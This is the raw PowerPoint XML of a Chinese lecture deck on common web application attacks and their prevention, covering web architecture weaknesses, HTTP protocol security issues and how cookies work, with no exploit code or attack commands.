                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>常见</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应用攻击及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777676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内容提纲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777679" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1279192" y="3448105"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7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369E7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7680" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1356156" y="3468742"/>
            <a:ext cx="30168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 rot="3419336">
            <a:off x="1242678" y="5134070"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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gray">
          <a:xfrm>
            <a:off x="2122155" y="5157837"/>
            <a:ext cx="568541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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0"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应用防火墙</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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WAF</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="32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gray">
          <a:xfrm>
            <a:off x="1346628" y="5165820"/>
            <a:ext cx="301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gray">
          <a:xfrm flipV="1">
            <a:off x="1522078" y="5673819"/>
            <a:ext cx="6268026" cy="460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795276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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>体系结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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107950" y="3213100"/>
            <a:ext cx="8636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客户端  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059113" y="3213100"/>
            <a:ext cx="1008062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服务器 </a:t>
            </a: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4716463" y="2276475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应用程序 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4716463" y="3213100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应用程序 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4716463" y="4221163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应用程序 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8585" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1871663" y="2962275"/>
            <a:ext cx="360362" cy="1150938"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 79846"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CC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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="黑体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581775" y="2736850"/>
            <a:ext cx="1878013" cy="792163"/>
            <a:chOff x="4146" y="1724"/>
            <a:chExt cx="1183" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408588" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4830" y="1724"/>
              <a:ext cx="499" cy="499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 数据库</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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sp>
          <p:nvSpPr>
            <p:cNvPr id="408587" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="4417" y="1621"/>
              <a:ext cx="223" cy="765"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 857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ea typeface="黑体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>连接器</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2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588125" y="3860800"/>
            <a:ext cx="1878013" cy="792163"/>
            <a:chOff x="4146" y="1724"/>
            <a:chExt cx="1183" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408591" name="AutoShape 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4830" y="1724"/>
              <a:ext cx="499" cy="499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 数据库</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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sp>
          <p:nvSpPr>
            <p:cNvPr id="408592" name="AutoShape 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="4417" y="1621"/>
              <a:ext cx="223" cy="765"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 857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ea typeface="黑体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>连接器</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="408593" name="AutoShape 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="408582" idx="3"/>
            <a:endCxn id="408587" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="2600325"/>
            <a:ext cx="787400" cy="58261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4" name="AutoShape 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="408583" idx="3"/>
            <a:endCxn id="408587" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5795963" y="3182938"/>
            <a:ext cx="787400" cy="3540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5" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="408592" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3573463"/>
            <a:ext cx="722313" cy="7334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6" name="AutoShape 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="408584" idx="3"/>
            <a:endCxn id="408592" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5795963" y="4306888"/>
            <a:ext cx="793750" cy="2381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7" name="AutoShape 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4211638" y="2708275"/>
            <a:ext cx="431800" cy="7207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8" name="AutoShape 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="3573463"/>
            <a:ext cx="4318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9" name="AutoShape 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="3789363"/>
            <a:ext cx="431800" cy="79216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08600" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3429000"/>
            <a:ext cx="5048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1" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="342900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2" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="364490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3" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="981075" y="3644900"/>
            <a:ext cx="5048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7" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="34924" y="1773238"/>
            <a:ext cx="1089025" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2602"/>
              <a:gd name="adj2" fmla="val 86824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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Firefox,</a:t>
            </a:r>
          </a:p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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408608" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1290637" y="1830388"/>
            <a:ext cx="1500188" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44338"/>
              <a:gd name="adj2" fmla="val 107776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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP/HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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08609" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4365625"/>
            <a:ext cx="914400" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43231"/>
              <a:gd name="adj2" fmla="val -94125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明文或</a:t>
            </a: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SSL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408610" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="4373563"/>
            <a:ext cx="1368425" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12296"/>
              <a:gd name="adj2" fmla="val -111269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HTTP</a:t>
            </a:r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响应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( HTML, JavaScript, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408612" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2987675" y="1773238"/>
            <a:ext cx="1219200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8204"/>
              <a:gd name="adj2" fmla="val 90384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Apache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IIS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etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408613" name="AutoShape 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="4652963"/>
            <a:ext cx="838200" cy="1889125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60417"/>
              <a:gd name="adj2" fmla="val -85125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Perl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C++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CGI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Java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ASP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PHP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etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408614" name="AutoShape 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227763" y="5157788"/>
            <a:ext cx="1008062" cy="1133475"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38977"/>
              <a:gd name="adj2" fmla="val -96500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ADO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ODBC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JDBC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etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408615" name="AutoShape 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6804025" y="1341438"/>
            <a:ext cx="1512888" cy="863600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27648"/>
              <a:gd name="adj2" fmla="val 96690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Oracle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SQL Server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4917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07" grpId="0" animBg="1"/>
      <p:bldP spid="408608" grpId="0" animBg="1"/>
      <p:bldP spid="408609" grpId="0" animBg="1"/>
      <p:bldP spid="408610" grpId="0" animBg="1"/>
      <p:bldP spid="408612" grpId="0" animBg="1"/>
      <p:bldP spid="408613" grpId="0" animBg="1"/>
      <p:bldP spid="408614" grpId="0" animBg="1"/>
      <p:bldP spid="4086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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用体系结构潜在弱点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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：负责将网站返回的页面展现给浏览器用户，并将用户输入的数据传输给服务器。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利用浏览器漏洞渗透目标主机成为主流</a:t>
            </a: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攻击方式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HTTP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en-US" dirty="0" smtClean="0"/>
              <a:t>：无状态；偷听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器通信，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重定向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443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端口；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2" y="1554163"/>
            <a:ext cx="7967027" cy="41148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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：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服务器软件漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>；攻击者利用这些漏洞，不仅可以对目标主机进行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攻击，严重的还能获得目标主机的管理员权限和数据库访问权限，窃取大量有用信息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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用程序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应用程序编程语言种类多，程序员不易深入了解和正确使用，留下安全漏洞。如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注入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数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：通过数据库查询运行优先权命令，查询操纵返回额外的数据集。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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用体系结构潜在弱点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35983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8824E7A-4C3E-43E2-911E-2CC0DFF6AE6F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321539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21540" name="Picture 3" descr="r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8" y="1016000"/>
            <a:ext cx="7416800" cy="5402263"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77252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4959" y="1318636"/>
            <a:ext cx="8055696" cy="4114800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应用程序功能与安全隐患的对应关系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0853" y="207386"/>
            <a:ext cx="7793037" cy="958850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应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全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6" y="1898073"/>
            <a:ext cx="83153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443326"/>
            <a:ext cx="7772400" cy="4694237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zh-CN" dirty="0"/>
              <a:t>协议是一种简单的、无状态的应用层协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC1945</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC2616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无状态使攻击变得容易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/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>需弄清复杂的二进制编码机制，攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可了解协议中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>明文信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>互联网中存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>大量中间盒子，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(RFC 2616</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC 7320)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的理解如果不一致，就有可能导致一些新的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（缓存投毒和过滤旁路）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协议安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27973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72667" y="1457180"/>
            <a:ext cx="7772400" cy="4597255"/>
          </a:xfrm>
        </p:spPr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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>？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解决无状态问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>保存客户服务器之间的一些状态信息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/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是指网站为了辨别用户身份、进行会话跟踪而储存在用户本地终端上的一些数据（通常经过编码），最早由网景公司的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Lou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Montulli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在</a:t>
            </a:r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月发明的，后被采纳为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>标准（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC2109</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC2965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的安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17663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6522" y="1429471"/>
            <a:ext cx="7772400" cy="4694237"/>
          </a:xfrm>
        </p:spPr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的生成与维护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>由服务器端生成，发送给客户端（一般是浏览器），浏览器会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的值保存到某个目录下的文本文件内，下次请求同一网站时就发送该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>给服务器（前提是浏览器设置为启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie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服务器可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>存储信息并经常性地维护这些信息，从而判断在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>传输中的状态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安全问题</a:t>
            </a:r>
